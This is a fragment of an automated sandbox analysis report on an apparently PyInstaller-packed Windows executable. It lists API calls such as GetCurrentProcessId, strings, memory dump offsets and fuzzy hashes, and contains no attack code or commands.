                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6ABA428DA,FFFFFFFF,00000000,00007FF6ABA4336A), ref: 00007FF6ABA4218E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: WARNING$[PYI-%d:%s]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3752221249
                                                                                                                                                                                                                                                        • Opcode ID: 28628bd70d5a97629098dcd42eabd330bee057474c06a66384895197b474a4b9
                                                                                                                                                                                                                                                        • Instruction ID: de0fffd2c597442b1eb3ae6addf18f0e589f245fe7007847d1501061cf37cac1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28628bd70d5a97629098dcd42eabd330bee057474c06a66384895197b474a4b9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA11937261AB8191E6209B65B8916EA7754FF887C4F400135FB8D83B69EE7CD1558700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6ABA41B79), ref: 00007FF6ABA41E9E
                                                                                                                                                                                                                                                        Strings
Similarity
• API ID: CurrentProcess
• String ID: ERROR$[PYI-%d:%s]
• API String ID: 2050909247-3005936843
• Opcode ID: c1c0bec23ccac853a0e083361079492e25c9a947d7081d13b76ea5259852d608
• Instruction ID: dd3ac65d766565f533f068840aa290888897a6180115024dae948baebf3a5b8e
• Opcode Fuzzy Hash: c1c0bec23ccac853a0e083361079492e25c9a947d7081d13b76ea5259852d608
• Instruction Fuzzy Hash: C9119072A1AB8191E6209B61B8816EA7764FF887C4F400135FB8D83B6AEE7CD1568704
Memory Dump Source
• Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 778d4a5eeee770603d02c5501bef52114850414878b0bee781498c4a1570bacf
• Instruction ID: 1464343e827c51e3a278db0ff2f4d70e18147a84979c93e0a9030c90c360f8aa
• Opcode Fuzzy Hash: 778d4a5eeee770603d02c5501bef52114850414878b0bee781498c4a1570bacf
• Instruction Fuzzy Hash: 7A112B32619B8182EB618F25F54026AB7E4FB88B88F585234DFDD47768EF3DD5518B00
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: a21020f9989eba13c36801fee87724dcdfb53302495b3b0e02d80308072ceaa1
• Instruction ID: b1e694ece41bd862f689cb3347ab88a9d94dde3568f95f62be7a014ffc6bc544
• Opcode Fuzzy Hash: a21020f9989eba13c36801fee87724dcdfb53302495b3b0e02d80308072ceaa1
• Instruction Fuzzy Hash: A4017C62A1D64286E730AF64946237E66A0EF4C748F802136DB4DC26A5FE2DE6449A14